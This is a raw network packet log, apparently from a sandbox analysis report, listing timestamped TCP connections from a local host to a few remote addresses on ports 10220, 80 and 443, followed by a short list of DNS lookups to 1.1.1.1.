                                                                                                                                                  Jan 11, 2024 13:35:16.209398985 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209434986 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209737062 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209755898 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209772110 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209773064 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209793091 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209793091 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209810972 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209811926 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209831953 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209835052 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209850073 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209853888 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209875107 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209884882 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209894896 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209933996 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209961891 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209999084 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210050106 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210067987 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210092068 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210107088 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210133076 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210190058 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210241079 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210251093 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210285902 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210323095 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210356951 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210388899 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210422039 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210457087 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210462093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210499048 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210566044 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210591078 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210618019 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210635900 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210663080 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210697889 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210742950 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210772991 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210820913 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210838079 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210880041 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210910082 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210928917 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.210957050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.210968971 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211255074 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211277008 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211292982 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211303949 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211311102 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211323023 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211328030 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211343050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211345911 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211363077 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211373091 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211380959 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211402893 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211414099 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211431980 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211457014 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211477041 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211510897 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211549997 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211581945 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211625099 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211649895 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211704016 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211729050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211740971 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211743116 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211776972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211812973 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211817026 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211858034 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211885929 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211922884 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.211931944 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211962938 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.211994886 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212034941 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212061882 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212106943 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212121964 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212162018 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212229013 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212276936 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212304115 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212316990 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212326050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212353945 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212359905 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212424040 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212429047 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212464094 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212469101 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212497950 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212503910 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212541103 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212568998 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212614059 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212630987 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212673903 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212702036 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212737083 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212748051 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212776899 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212778091 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212816000 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212843895 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212889910 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.212938070 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.212980986 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.213025093 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.213063955 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.213087082 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.213107109 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.213129997 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.213185072 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.264796972 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.266216040 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.454085112 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.454499006 CET102204973249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.454576969 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.455012083 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.457573891 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.643688917 CET102204973249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.643959045 CET102204973249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.644020081 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.644406080 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.646886110 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.646920919 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.835236073 CET102204973249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.111155033 CET102204973249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.111237049 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.202681065 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.203423023 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.391520023 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.391593933 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.391880035 CET102204973349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.391974926 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.392430067 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.581038952 CET102204973349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.581482887 CET102204973349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.581540108 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.599275112 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.601854086 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:17.790366888 CET102204973349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:17.958156109 CET4973480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:17.960896969 CET4973580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.070029020 CET102204973349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.070130110 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.168036938 CET8049735109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.168165922 CET4973580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.168469906 CET4973580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.176968098 CET8049734109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.177463055 CET4973480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.177783012 CET4973480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.376106977 CET8049735109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.378374100 CET4973580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.378572941 CET4973580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.379925013 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.380595922 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.397242069 CET8049734109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.400263071 CET4973480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.401913881 CET4973480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:18.568335056 CET102204973249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.568465948 CET4973210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.568979979 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.569103003 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.570200920 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.585503101 CET8049735109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.620081902 CET8049734109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.759507895 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.759701967 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:18.759962082 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.760200024 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.763387918 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:18.952456951 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:19.240072012 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:19.240261078 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.489104033 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.490063906 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.677684069 CET102204973349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:19.677743912 CET4973310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.678638935 CET102204973749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:19.678711891 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.708106995 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.896929026 CET102204973749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:19.897278070 CET102204973749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:19.897336960 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.897675991 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.900332928 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:19.903846025 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.089220047 CET102204973749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.089368105 CET4973710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.092313051 CET102204973849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.092560053 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.092945099 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.172987938 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.173010111 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.173084021 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.181436062 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.181444883 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.281270981 CET102204973849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.281748056 CET102204973849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.281878948 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.282504082 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.284780025 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.287137032 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.382060051 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.382204056 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.388057947 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.388065100 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.388355017 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.388421059 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.390533924 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.433911085 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.473386049 CET102204973849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.473512888 CET4973810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.475764036 CET102204974049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.477799892 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.482871056 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.671188116 CET102204974049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.671706915 CET102204974049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.671766996 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.672349930 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.674797058 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.676879883 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.863395929 CET102204974049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.863459110 CET4974010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.865107059 CET102204974149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.865179062 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.865853071 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:20.877801895 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.877893925 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.877918959 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.877935886 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:20.877960920 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.877980947 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.878181934 CET49739443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:20.878192902 CET44349739172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.054846048 CET102204974149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.054871082 CET102204974149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.054939032 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.055388927 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.057925940 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.060391903 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.246406078 CET102204974149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.246480942 CET4974110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.248733997 CET102204974249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.248810053 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.249228001 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.438261986 CET102204974249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.438441992 CET102204974249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.438503027 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.438944101 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.441737890 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.444434881 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.631824970 CET102204974249.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.632014036 CET4974210220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.634152889 CET102204974349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.634233952 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.634651899 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.823038101 CET102204974349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.823174000 CET102204974349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:21.823306084 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.825928926 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:21.828031063 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:22.016426086 CET102204974349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:22.016676903 CET4974310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:36:29.241578102 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:36:29.241739035 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:36:29.241749048 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:36:29.241836071 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:36:55.826884985 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:36:55.827064037 CET4973610220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:36:56.018532038 CET102204973649.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:36:56.018701077 CET4973610220192.168.2.1149.12.114.15

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 11, 2024 13:34:55.756232023 CET5916753192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:34:55.919476032 CET53591671.1.1.1192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.841063976 CET6002453192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:34:58.845944881 CET5167753192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:34:59.848294020 CET5167753192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:34:59.848404884 CET6002453192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:35:00.863744974 CET6002453192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:35:00.863744974 CET5167753192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET53516771.1.1.1192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET53516771.1.1.1192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET53516771.1.1.1192.168.2.11
